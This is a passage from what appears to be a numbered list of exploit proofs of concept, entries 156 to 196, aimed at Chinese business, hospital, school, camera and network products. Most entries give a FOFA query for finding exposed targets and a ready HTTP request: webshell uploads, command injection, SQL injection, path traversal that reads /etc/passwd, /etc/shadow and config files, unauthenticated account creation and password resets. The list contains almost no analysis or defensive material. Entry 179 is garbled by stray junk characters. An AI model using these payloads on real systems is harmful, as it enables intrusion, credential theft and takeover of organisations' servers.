User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file to see the output: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达医学影像存档与通信系统 WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexfileupload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统存在任意文件读取! P8 W! }* X, r2 R, c4 X
POST /Common/DownLoad2.aspx HTTP/1.1
- A4 g5 v2 s# C2 ~& _, C$ p: ]  GHost: {{Hostname}}- c& r; ^- h- {4 U* z" q" X
Content-Type: application/x-www-form-urlencoded
9 H8 v9 C1 ~2 K2 D3 f7 N$ _5 d4 X  wUser-Agent: Mozilla/5.0
/ ?" [' s8 g, C
+ u" j2 o% s) o0 ppath=../log4net.config&Name=% ^* |+ g1 b% `8 Y, N; G
! b- Z, [+ y6 \, z1 |

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
The poi value is fetched as a URL; the file:// scheme turns that fetch into a local file read.
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
Keep the /js/../ segment in the path; it is part of the PoC.
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The name=.ashx query parameter decides the stored extension; the body is an ASP.NET generic handler that writes "test" when the uploaded file is requested.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: fetch the CSRF token (reuse the same PHPSESSID in step 2):
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: submit the command, with {{token}} replaced by the value returned in step 1. The param value is an expression evaluated server-side; the PoC uses Python's os.system() to write a marker file under the web root.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read the marker back:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present. The filename carries a path traversal that drops the JSP straight into the deployed fe.war directory.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet access management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
The name value is inserted into a shell command; the leading ; terminates the intended command and runs uname -a.
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
The request carries no session; xgh selects the account and newPass becomes its new password.
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

